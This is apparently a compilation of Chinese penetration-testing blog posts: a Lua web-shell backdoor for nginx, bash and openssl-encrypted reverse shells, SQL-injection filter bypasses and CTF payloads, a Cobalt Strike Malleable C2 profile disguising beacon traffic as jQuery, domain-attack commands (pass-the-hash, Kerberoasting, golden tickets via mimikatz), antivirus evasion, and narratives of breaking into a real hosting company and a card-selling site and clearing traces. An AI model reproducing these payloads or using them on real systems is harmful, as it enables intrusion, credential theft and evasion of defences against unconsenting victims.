要求

安装有ngx_lua模块，在openresty和tengine中是默认安装了ngx_lua模块的。

我这里拿openresty举例，你可以在这里下载win平台打包好的。

步骤

找到conf/nginx.conf，在server块中添加路由

location = /a.php {  
    default_type 'text/plain';  
    content_by_lua_file lua/backdoor.lua;
}

然后创建lua/backdoor.lua脚本，你也可以创建在任意位置，不过要对应上文的content_by_lua_file字段

ngx.req.read_body()
local post_args = ngx.req.get_post_args()
local cmd = post_args["cmd"]
if cmd then
    f_ret = io.popen(cmd)
    local ret = f_ret:read("*a")
    ngx.say(string.format("%s", ret))
end

重载nginx

nginx -s reload

浏览器访问

文后

在实际的环境中，conf文件并不固定，你需要针对不同站点的配置文件去修改。

而location你可以更灵活一些，毕竟他能用正则表达式🙄，具体怎么用看你自己咯。

参考链接

1. https://github.com/netxfly/nginx_lua_security
2. https://xz.aliyun.com/t/6088

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

在我们实际的渗透测试过程中，总是有各种各样的流量审查设备挡住我们通往system的道路，尤其是在反弹shell的时候，明文传输的shell总是容易断，那么本文介绍一种利用openssl反弹流量加密的shell来绕过流量审查设备。

常规bash反弹

vps执行 nc -lvvp 4444

目标主机执行 bash -i >& /dev/tcp/172.16.1.1/4444 0>&1

流量明文传输，很容易被拦截。

openssl加密传输

第一步，在vps上生成SSL证书的公钥/私钥对

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

第二步，在VPS监听反弹shell

openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

第三步，在目标上用openssl加密反弹shell的流量

mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s

流量已经被加密。

参考链接

1. https://www.t00ls.net/articles-52477.html
2. https://www.freebuf.com/vuls/211847.html
3. https://www.cnblogs.com/heycomputer/articles/10697865.html

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

过滤了单引号可以利用以下几种方法绕过。

1. 整数型注入
  整数型注入就不用多废话了，只有在判断表名和列名的时候需要用到单引号，但是可以利用char函数和16进制绕过。利用sql语句写入文件的时候也可以利用16进制，因为mysql会将16进制解析。
2. 字符型注入
  gbk编码，另外可以根据具体的waf/ips规则进行bypass，比如dedecms中的全局过滤ips绕过方式。

过滤select

其实过滤了select基本无解，起码在我这个菜逼眼里是这样的，但是也要考虑特殊情况。比如今年的强网杯的一道题目，虽然过滤了select但是可以堆叠查询，因此有了绕过的方法。

//用到的语句
set语句可用于向系统变量或用户变量赋值。 eg: SET @s1ye=test;
PREPARE stmt_name FROM preparable_stmt 定义预处理语句，它将包含占位符(?)的查询传递给MySQL服务器。
EXECUTE stmt_name  执行预处理语句

过滤逗号

1. 盲注：

   利用from 1 for 1

2. 可回显注入：

   利用 A join B

3. 使用like：

   select user() like ‘r%’;

4. limit时的利用方法在下面limit部分。

A join B:
  INNER JOIN（内连接,或等值连接）：获取两个表中字段匹配关系的记录。
  LEFT JOIN（左连接）：获取左表所有记录，即使右表没有对应匹配的记录。
  RIGHT JOIN（右连接）： 与 LEFT JOIN 相反，用于获取右表所有记录，即使左表没有对应匹配的记录。
  用法就很简单了，我们用的到第一种方法，INNER可以省略，效果一样。
  eg: select a.name,b.password from users a join passwd n;
  在回显注入下使用：
  ?id=-1 union select * from ((select 1)a join (select 2)b join (select 3)c join (select 4)d)

from 1 for 1:
  没啥好说的直接看例子，eg
  ?id=-1 union select 1,2,ascii(substr((database()) from 1 for 1))='r'--+

"like" eg:(tablename=name)
  select * from name where id =1 and (select group_concat(table_name) from information_schema.tables where table_schema=database()) like 'n%';

比较符号绕过

1. between a and b：返回a，b之间的数据，不包含b。
2. greatest()、least()：（前者返回最大值、后者返回最小值）

​ eg: select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

​ 所以上述语句就是与64比较，当页面正常返回时说明真实的ascii码小于或等于64，继续fuzz即可。

等号绕过

可以使用like、rlike、regexp 或者<>。盲注时也可以利用运算符，^、+、-等，观察返回结果与页面变化即可，举一反三灵活运用。

order by 注入

利用oder by盲注的话看文章：

一道题引发的无列名注入

注入点在order by 后的盲注
1. if（条件语句）
  ?order=if((1=1),sleep(3),1)
2. 直接and if
  看图
3. rand()盲注：
  order by rand(true); order by rand(false);

注入点在order by 后的报错注入:
1. 利用procedure存储过程
2. XPATH
   select * from name order by extractvalue(1,concat('~',database(),'~'));

#利用LINES TERMINATED BY方式getshell
   ?order=1 limit 0,1 into outfile '/tmp/2.php' LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E

limit注入

注入点在limit后的注入：
  同样的利用procedure存储过程 （https://www.leavesongs.com/PENETRATION/sql-injections-in-mysql-limit-clause.html）
看文章就可以了

如果注入中需要用到limit但是又过滤了逗号，可以利用以下方法。
select * from users limit 0,1;
# 等价于↓
select * from users limit 1 offset 0;

盲注带外

直接看文章，利用dnslog带外的话需要一些权限，比如必须有FILE权限、secure_file_priv为空而不是NULL（不为空就只能读限定目录的文件）

chabug一位师傅的文章

substr替换

mid,left,right,substring,lpad,rpad等

题目地址 http://152.136.179.79:18084/ 传入id=3为flag的id。

常规联合查询注入

http://152.136.179.79:18084/?id=3 union select 1,2,3

三个字段

http://152.136.179.79:18084/?id=3 union select 1,2,(select table_name from information_schema.tables where table_schema=database())

拿到flag所在的表，继续查列名

http://152.136.179.79:18084/?id=3 union select 1,2,(select column_name from information_schema.columns where table_name='this_1s_th3_fiag_tab13')

死活查不出来，应该是过滤了column关键字，没有列名怎么查出来数据呢？？？

有两种方法
1. order by盲注
2. 子查询

本地测试建表

order by盲注

order by用于根据指定的列对结果集进行排序。一般上是从0-9a-z这样排序，不区分大小写。

先来本地测试一下

可以看到我们构造的数据排在了第一行

仍然在第一行

当拿’q’和’pass’做比较时，我们构造的数据被排在了第二行。由此可以来根据不同的回显来逐位判断。

拿我们这道题来说

1的时候我们的数据在前

2的时候原始数据在前，说明第一位是1

然后判断第二位

1a的时候我们的数据在前

1b的时候原始数据在前，说明第二位是1a

由此逐位判断。

子查询

在无列名的情况下，用子查询可以很简单的将数据跑出来。

子查询是将一个查询语句嵌套在另一个查询语句中。在特定情况下，一个查询语句的条件需要另一个查询语句来获取，内层查询（inner query）语句的查询结果，可以为外层查询（outer query）语句提供查询条件。

这个语句将列名转换为了1,2,3，这个时候列名就已知了，我们可以用子查询将数据归并。

此时就能查出来数据了，然后我们再来看这个题。

我们已知了表名为this_1s_th3_fiag_tab13，但是不知道这个表有几个字段

可以用联合查询的方式来判断字段数。

查出数据

拿到我们这个题里来

payload

http://152.136.179.79:18084/?id=3 union select 1,2,x.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from this_1s_th3_fiag_tab13)x

子查询真是个好东西👍

写在文后

本文介绍了两种无列名注入的方式，很巧妙的在没有列名的情况下查出来数据，在实际利用中更推荐用子查询的方式，毕竟盲注有可能费力不讨好。

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

配置示例

一个简单的 HTTP Malleable C2 Profile.

set sample_name "my";
set sleeptime "5000";
set tcp_port "7001";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36";

http-get {

    set uri "/jquery.min.js";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
        parameter "ver" "1.2.4";

        metadata {

            base64;
            prepend "token=";
            header "Cookie";

        }

    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {

            base64;
            prepend "/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)";
            append "var nc=a.jQuery,oc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=oc),b&&a.jQuery===n&&(a.jQuery=nc),n},b||(a.jQuery=a.$=n),n});";
            print;

        }
    }
}

http-post {

    set uri "/wp-admin";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
        header "Cookie" "wordpress_test_cookie=WP+Cookie+check";

        id {

            base64;
            prepend "PHPSESSID=";
            header "Cookie";

        }

        output {

            base64;
            print;

        }
    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "text/html; charset=UTF-8";

        output {

            base64;
            print;

        }
    }
}

http-stager {

    set uri_x86 "/favicon1.ico";
    set uri_x64 "/favicon2.ico";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";

    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "image/x-icon";

        output {

            print;

        }
    }
}

下面将会基于这个配置文件依次进行讲解.

但先来看看这个配置文件做了什么. 以 http-get 为例, 该代码块仅对通信过程中的 GET 请求有效.

http-get {

    set uri "/jquery.min.js";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
        parameter "ver" "1.2.4";

        metadata {

            base64;
            prepend "token=";
            header "Cookie";

        }

    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {

            base64;
            prepend "/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)";
            append "var nc=a.jQuery,oc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=oc),b&&a.jQuery===n&&(a.jQuery=nc),n},b||(a.jQuery=a.$=n),n});"
            print;

        }
    }
}

http-get 中分为 client 和 server 两大块, 分别针对 Beacon 发送的请求和 C2 响应的内容进行修改.

首先我们指定了参数 uri 为 /jquery.min.js, 表示通信时请求的 URL 地址.

在 client 块里, 我们在请求头中添加了 Accept-Language 字段, 对要发送的 Metadata 进行 base64 编码并拼接字符串, 然后将数据存放在 HTTP 头中, 其内容为 Cookie: token=BASE64_ENCODED_DATA , 最终发送至 C2.

在 server 块里, 我们在响应头中添加了 Server 和 Content-Type 字段, 在响应内容的前后加上 jQuery 代码, 最后进行 base64 编码并响应在 HTTP Body 里.

通信过程

在此之前. 我觉得有必要了解一下 Beacon 与 C2 的通信过程.

当 Beacon 被执行后, 会在 C2 上下载载荷执行, 即 Stage 过程, Stageless 则省去了这一步.

之后, Beacon 根据设置的睡眠时间进入睡眠状态, 结束后向 C2 发送有关 Beacon 的信息如系统类型, 版本, 当前用户, 称之为 Metadata.

如果存在待执行的任务, C2 就会响应发送 Metadata 的请求, Beacon 将会收到有关 Task 的具体内容和唯一的 Task ID, 并依次执行任务.

执行完毕后, Beacon 将各 Task 回显的数据与对应的 Task ID 依次上传至 C2, 然后再次进入睡眠状态.

其中 Beacon 发送 Metadata 时一般使用 GET, 上传回显数据时使用 POST.

代码结构

我们对于流量特征的修改都是在指定的代码块中进行的, 以下是上文中的代码块.

http-get {

    client {

        metadata {

        }

    }

    server {

        output {

        }
    }
}


http-post {

    client {

        id {

        }

        output {

        }
    }

    server {

        output {

        }
    }
}


http-stager {

    client {

    }

    server {

        output {

        }
    }
}

可以看到, 代码块按 HTTP 请求分为 http-get http-post 两种, 以及被单独列出来的 http-stager 用于 stage 过程.

按照对象分为 client 和 server, 按照不同的通信步骤分为 metadata id 和 output.

这里 client 和 server 恰好都有 output 块, 可能会有点不理解. 简要说明一下, Beacon 在上传 Task 数据时是需要对应的 Task ID 的, id 块正好是针对 Task ID 的修改, output 块则是修改通过 POST 发送的数据, 而 server 中的 output 块仅仅是用于修改响应内容的, 不要弄混了.

语句与参数

自定义参数

在之前的代码中, 我们在开头指定了一些自定义参数.

set sample_name "my";
set sleeptime "5000";
set tcp_port "7001";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36";

这些是作用于全局的参数, 统一的语法为 set key "value" 且后面需要加上分号, 字符串仅能使用双引号表示.

另外可以通过反斜杠来表示特殊字符, 例如 n, r, t, ", \, Unicode 字符 u123 和Hex 字符 x123.

参数很简单, 就不再细说了. 需要注意的是 tcp_port. 还记得之前的 Bind TCP Beacon 吗? 通过 tcp_port 我们就能够更改目标 Beacon 监听的端口.

而对于这些参数.

set uri "/jquery.min.js";
set uri_x86 "/favicon1.ico";
set uri_x64 "/favicon2.ico";

则只能放在 http-get http-post 和 http-stager 中.

其中 uri 可在 http-get http-post 中指定, 表示通信时请求的 URL, 例如 /wp-admin.

uri_x86 和 uri_x64 是指在不同位数的系统上 stage 过程中所请求的 URL, 两者不能重复. 个人建议在写的的时候也尽量使用二进制文件的路径, 例如 JPG PNG GIF.

语句

在 Malleable C2 中, 语句可分为数据转换语句, 终止语句, 额外语句 (Header and Parameter) 三种类型.

数据转换语句有 base64 base64url mask netbios netbiosu prepend append.

终止语句有 print uri-append header parameter.

额外语句有 header parameter.

输出位置

首先来讲一下终止语句, 也就是指定传输数据的存放位置. Malleable C2 提供了 4 种方法: print uri-append header parameter, 分别为存放在 HTTP Body, URL, HTTP 头和 GET 参数中.

终止语句只能写进 metadata id output 块, 不能直接放在 client 和 server 里, 而且终止语句的后面不能有其它语句, 也就是说只能放在代码块末尾.

其中 print 和 uri-append 无须指定参数, 后两者的格式为 header "Cookie" 和 parameter "action", 即存放位置为 Cookie 字段和 action 参数. 四种方法中只有 print 能够存放长数据.

举个例子.

metadata {

    base64;
    prepend "token=";
    header "Cookie";

}

上面我们将数据进行 base64 编码, 并在其前面添加 token=, 最后存放在 HTTP 头的 Cookie 字段中, 最后的效果为 Cookie: token=BASE64_ENC_DATA.

编码与加密

还是上面的代码.

metadata {

    base64;
    prepend "token=";
    header "Cookie";

}

这里的 base64 叫作数据转换语句, 只能写进 metadata id output 块中. 所有的数据转换语句都不需要传参, 但都不能放在 http-stager 块中 (因为那么点 Payload 长度没空间给你写解码函数).

另外还有 base64url mask netbios netbiosu. base64url 编码后的数据是可以放在 URL 中的, mask 为异或加密, 至于 netbios netbiosu 则是在 SMB 传输过程中针对主机名的编码方式.

最后说一个需要注意的点.

metadata {

    prepend "token=";
    base64;
    header "Cookie";

}

以这种顺序编码的话, 它就会将 token= 字符串与数据一起编码, HTTP 字段就会变成 Cookie: BASE64_ENC_DATA.

伪造与混淆

prepend 和 append 混用.

output {

    base64;
    prepend "/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)";
    append "var nc=a.jQuery,oc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=oc),b&&a.jQuery===n&&(a.jQuery=nc),n},b||(a.jQuery=a.$=n),n});"
    print;

}

我们通过 base64 加密数据, 并在其前后添加 jQuery 代码, 最终通过 HTTP Body 输出.

其中的 prepend 和 append 是可以放进 http-stager 块的, 两者合理搭配的话能够达到隐蔽的效果. 例如分别插入图片开头和末尾的 blob, 把数据留给中间.

不过除了 prepend append 就没有别的混淆办法了吗? 答案是有的.

client {

    set uri "/jQuery.min.js"
    header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
    parameter "ver" "1.2.4";

}

上述代码通过 header 和 parameter 添加用于混淆的 HTTP 头和 GET 参数, 格式为 header "key" "value" 和 parameter "key "value", 最终的效果是请求了 /jQuery.min.js?ver=1.2.4 这个地址.

注意这里的 header 和 parameter 我称之为额外语句, 与终止语句的不同在于它们的位置不一样. 额外语句只能写进 client 和 server 块, 而不是 metadata id 和 output 块.

调试运行

Cobalt Strike 默认给我们了 c2lint 用于检查配置文件的语法错误, 同时还能够预览配置后的 HTTP 请求与响应.

通过 teamserver 命令的第三个参数指定配置文件.

一些话

Github 上的 Malleable C2 Profile.

rsmudge/Malleable-C2-Profiles

threatexpress/malleable-c2

这篇文章也只是给 Malleable C2 开了个头, 并没有涉及到什么太过深入的东西. 例如如何自定义命名管道, DNS 传输, 添加证书, 签名等.

加油吧 🙂

Cobalt Strike 中在内网中比较常用的通过 SMB, Bind TCP, Reverse TCP 上线的三种方式.

SMB Beacon

这种上线方式走的是 SMB 协议, 正向连接, 目标机器必须开启 445 端口, 同时利用命名管道来执行命令, 对于那些在内网中无法出网的机器就特别好用. 但是并不能直接生成可用载荷, 只能使用 PsExec 或 Stageless Payload 上线.

不难看出, 这是在已有 Beacon (父 Beacon) 中使用 SMB 进行连接的, 在实际测试中可能会在多个 Beacon 上分别连接对应的 SMB Beacon, 所以溯源就比较困难, 在一定程度上可以达到规避防火墙的效果.

下面新建 SMB Beacon Listener, 其中的 Host 和 Port 并没有什么用.

在已有 Beacon 中通过 PsExec 上线.

上线成功.

拓补图中橙色的箭头代表着是通过 SMB 方式连接的, 而箭头的方向表明这是一个正向连接, 另外在 external 后会有 ∞∞ 的图标, 显示了与目标 Beacon 的连接状态.

因为 SMB 走的是 TCP 连接, 就不存在什么异步执行, 所以 last 就可以无视掉了, 数值也只是距离上一次操作经过的时间.

对于 SMB Beacon 有两个命令, link 和 unlink.

unlink 可以暂时断开和目标 Beacon 的连接, 但不会退出进程, 而 link 就又会重新连接回去, 两者都需要在发起连接的 Beacon 上执行.

unlink.

图标会从 ∞∞ 变为 ∞ ∞, 箭头上显示 DISCONNECTED, 颜色变为红色, 但进程仍在运行.

我们在另外一台主机上 link.

这台 DC2 没有加入域, 需要手动创建 Token 来通过 SMB 认证.

make_toekn DC2administrator admin7!@#

拓补图中箭头的位置改变了.

也就是说我们可以在任意已有 Beacon 上 link 目标 Beacon, 通过这个父 Beacon 去与目标 Beacon 通讯, 避免了不出网的尴尬. 但同一时间同一 Beacon 只能被 link 一次, 切换父 Beacon 的时候需要在原 Beacon 上先执行一次 unlink 操作, 还得注意凭据能否认证成功.

Bind TCP Beacon

Bind TCP Beacon 与 SMB Beacon 差不多, 但它可以直接生成载荷在目标机器上执行.

添加 Bind Tcp Beacon Listener. Host 没有实际用处, Port 写死了是 4444, 更改也没有用, 在目标机器上还是会监听 4444 端口的.

生成 Stageless Payload.

这里说一下 Staged 和 Stageless 的区别. 前者的实际功能只是和 C2 建立连接并接收 Payload, 然后加载执行, 而 Stageless 直接省去了接收 Payload 的步骤. 所以 Stageless 的 Payload 都会比 Staged 类型的要大很多, 而且包含了特征容易被杀软拦截.

不过这里的 Bind TCP Beacon 是正向连接, 而且仅与父 Beacon 通信, 所以就只能使用 Stageless 类型的了.

执行后要手动去连接, 而 PsExec 方式会直接通过之前选择的 Beacon 上线.

与 SMB Beacon 不同, Bind TCP Beacon 对应的是 connect 和 unlink.

拓补图中的箭头变成绿色的了, 这表明我们是通过 Bind TCP Beacon 连接的.

其余操作与 SMB Beacon 完全相同, 这里就不说了.

但如果在同时 link 和 connect 同一 Beacon 的机器上上执行 unlink, 两者就都会被退掉.

Reverse TCP Beacon

反向连接已有 Beacon 上线, 但这个并不能直接在 Listeners 中添加, 需要右键已有 Beacon – Pivoting – Listener 添加.

指定反向连接的 Listen Host 和 Listen Port. 一般默认即可, 除非机器有多个网卡. 这里意为将该机器作为跳板机, 让上线 Beacon 去连接这台机器, 然后与 C2 通信. 因而内网中每台机器都可以创建一个 Reverse TCP Beacon Listener, 所以溯源时也会有难度.

Reverse TCP Beacon 只能通过 Stageless Payload 上线.

上线成功.

其中拓补图中箭头的方向变了, 这表明我们是通过反向上线的.

需要注意的是, Reverse 方式是没有 link unlink 一说的, unlink 之后就会直接退出进程, 想重新上线就必须要再次执行 Payload.

IPC$入侵

• 建立非空连接
  

• 新建批处理
  

• Copy命令上传
  

• 查看目标靶机时间
  

• 通过at命令在特定时间执行批处理文件
  

• 在目标靶机上查看
  

其他命令

• 将目标共享建立一个映射g盘
  net use g: \\192.168.3.68\c$
  

• 查看已建立的会话
  

通过工具进行会话连接执行

psexec.exe  \\192.168.1.108   cmd  -uadministrator   -p  123456

csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

返回一个cmd交互界面执行即可

MS14068

• 首先尝试访问域控共享文件夹
  
  拒绝访问

• 使用ms16048

-u 域账号+@+域名称
-p 为当前用户的密码，即 ts1 的密码
-s 为 ts1 的 SID 值，可以通过 whoami /all 来获取用户的 SID 值 -d 为当前域的域控

• 生成ccache文件
  

• 删除当前缓存的kerboeos票据
  kerberos::purge
  

• 导入ccache文件
  kerberos::ptc
  

• 再次访问域控共享文件
  

Kerberoating

早期kerberoating

工具 Kerberoast工具包 Mimikatz

• 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描

• 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据
  Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SRC_DB_ODAY.org:1433"
  

• 通过klist命令查看当前会话存储的Kerberos票据
  klist
  

• 使用mimikatz导出
  kerberos::list /export
  

• 使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破
  python tgsrepcrack.py list1.txt 2-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
  

kerberoating新姿势

工具 Invoke-Kerberoast.ps1 HashCat

• 转为Hashcat格式
  Invoke-kerberoast –outputformat hashcat | fl
  
• 保存
  nvoke-Kerberoast -Outputformat Hashcat | fl > test1.txt

• Hashcat爆破
  hashcat64.exe –m 13100 test1.txt password.list --force

Pth

Pass the hash

• 使用mimikatz先获取hash

privilege::debug

sekurlsa::logonpasswords

• 攻击机执行

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"

• 验证pth

wmiexec

• Invoke-SMBExec

https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

• Invoke-SMBExec

Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

如果只有SMB文件共享的权限，没有远程执行权限，可以使用该脚本

• wmiexec.py

https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

https://github.com/maaaaz/impacket-examples-windows

wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/administrator@192.168.3.21 "whoami"

普通用户可用

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec.git

crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

Ptk

对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012，可以使用AES keys代替NT hash

• 获取用户的aes key

mimikatz "privilege::debug" "sekurlsa::ekeys"

• 注入aes key

mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436" 

Ptt

Golden ticket(黄金票据)

前提：
域名称
域SID
krbtgt账户密码
伪造用户名

• dump krbtgt hash

privilege::debug
lsadump::lsa /patch

• 生成ticket

kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi

• 注入凭据

kerberos::ptt test.kirbi

– 验证Golden ticket

golden ticket（白银票据）

前提：
域名称
域SID
域的服务账户的密码hash
伪造用户名

• dump server hash

privilege::debug
sekurlsa::logonpasswords

• 导入凭证

kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt

• 验证

Tips

mimikatz复制粘贴困难，可使用如>>log.txt

exploit/windows/smb/psexec 使用hash传递

post/windows/gather/smart_hashdump 读取hash

.domain_list_gen 获取域管理账户列表

auxiliary/gather/kerberos_enumusers 用户名枚举

auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068

load kiwi
kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi kiwi扩展来导入TGT票证
参考：https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/

• Mimikatz

load mimikatz 加载
mimikatz_command -f version  版本
mimikatz_command -f fu 获取可用模块列表
msv 检索msv凭证
wdigest 读取密码
kerberos 尝试检索kerberos凭据

看到了再加～

@X1r0z的鬼点子 https://exp10it.cn/msf-execute-from-memory.html

具体原理和进程注入类似, 先创建一个正常的进程, 然后把这个进程里的内存空间覆盖成我们想要执行的程序.

Meterpreter 方式.

execute -H -m -d notepad.exe -f mimikatz.exe -i
-H 隐藏窗口.

-m 在内存中执行.

-d 指定覆盖进程 (dummy).

-f 指定执行程序 (本地文件).

-i 与该程序交互 (可选).

-a 传递参数 (可选).

在实际测试中能够绕过 360 的检测, 当然前提是你反弹会话的 payload 是免杀的.

文章首发于T00LS,未经允许禁止转载

前言

记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。

getshell

目标是某建站公司，大致看了一下伪静态，没什么直接撸的欲望，一边扫着端口的同时，一边测了几个案例网站。 好在没让我失望，注入一枚

这个时候端口也扫完了，有两个端口引起了我的注意，999和6588。分别是phpmyadmin和护卫神。 尝试了一下弱口令都无果，整理了一下收集到的信息，以及可利用的点。 案例站大部分与建站公司的网站在同一个服务器上，服务器为 iis7.5,windows2008（存在解析漏洞） 此时有几种方式getshell： 1.直接注入into outfile 2.前台随便找一个上传点传一个包含一句话的图片 3.注入案例站读取管理员密码后台上传 4.挖其他漏洞如：远程文件包含等可直接getshell漏洞 第一二条都失败了，案例站的数据库用户没有读写权限，前台无上传点，由于第四条相对于来说需要另外的时间去挖并且远程包含这种基本没戏，所以最终只能后台getshell了。执行命令发现无法执行，应该是权限不够？上传了aspx大马，访问500，心态炸裂。

提权思路： 1.phpmyadmin直接udf提权（无权限读写） 2.登录护卫神，和流光表哥@赢时胜流光同样的方法 3.搞一个可以解析aspx，权限高一点的网站？等 最后利用2，3结合搞定。

登录护卫神后台+提权

护卫神的漏洞利用条件是可以上传可执行脚本，来读取本地登录护卫神的cookie。shell已经拿到了，直接上传脚本读取cookie。f12 document.cookie 刷新:

这个护卫神是3.7版本的，没有找到上传点，但是不慌，有ftp账号密码，并且找到了支持asp,aspx的网站，直接上大马。可以执行命令，补丁打了倒是不少，查了一下可以利用的exp，用论坛里的几个免杀的烂土豆exp都失败了，webshell版的也报错。

最后弹到cs上，随手试了一下cs自带的提权exp ，ms14那个，尼玛成了。

tasklist /svc查看一下远程端口，由于是外网，直接登录。

读了管理员的密码，清理痕迹溜了。（密码是随机的十二位大小写加特殊字符，这谁顶得住啊） 

总结

水文，每次搞完回头再看的时候都觉得没什么技术含量，的确也是没有什么骚操作，总结一下这次渗透，只有这个读取cookie的php脚本，我学到了，嘻嘻嘻，溜溜球~

本文首发于secquan，未经许可禁止转载

百度云盘真的恶心，不开会员10k/s。

前言#

前天找了点域渗透的环境和资料，都是百度云盘存储的，一个镜像十几个g，下不下来，发现网上有卖百度云VIP账号的，都是一些发卡网，刚好自己最近在学代码审计，就想着下载一套源码自己看看能不能审出漏洞。没想到还真看出来了点东西。

开搞#

目标站点xx.com扫出了readme.txt，是企业版PHP自动发卡源码免授权优化版

看到这免授权优化版我就知道有戏，很可能存在后门。网上找了一套

目录结构和目标站点一样，应该就是这套了。

本地搭建，然后源代码扔到seay先跑着，我先大概看下架构

index.php入口

典型的mvc架构

伪静态重写URL

代码审计这方面我是新手，所以我的目标是找找sql注入、未授权访问、上传点以及越权，当然考虑到是免授权优化版，我还可以找找后门：文件遍历或者代码执行

[后门?]文件遍历#

/bom.php的checkdir()函数

递归遍历当前目录下的所有文件。

这个文件应该是去除文件的bom头，不知道算不算后门。

过滤方式#

\includes\libs\Functions.php

全局makeSafe()函数过滤，强转数字，addslashes()和mysql_real_escape_string()转义字符串，strip_tags去除html标签

\includes\libs\Mysql.php

MySQL使用UTF8编码

我发现的SQL语句变量全部使用单引号进行包裹，寄希望于seay，暂放。

[后门]获取管理员账户#

\admin\adminInfo.php没有鉴权

payload：/admin/adminInfo.php?action=get

[后门]无需密码登录后台#

还是\admin\adminInfo.php

payload:先访问/admin/adminInfo.php?action=info&id=1然后访问/admin/

[后门]SQL注入#

还是\admin\adminInfo.php的infomethod()函数

id直接代入数据库查询，可尝试into outfile

payload

后台任意文件上传#

/admin/set.php未对文件后缀校验

漏洞利用#

文件遍历拿到后台=>adminInfo.php拿到管理员账户或直接登陆=>任意文件上传拿shell

实战#

后门进入后台，上传没有写文件权限，sql注入outfile写文件被宝塔拦截，尝试多种方法无果，放弃，毕竟账号已经有了，下东西去。

ps:我没想到一个卖百度云账号的流水一天也能7k

总结#

网站是死的，思路是活的。渗透测试的精髓是指哪打哪，希望我可以做到。另外如果有师傅知道怎么绕过宝塔写shell的请pm我，感激不尽。有在学代码审计的同学也欢迎找我交流哦！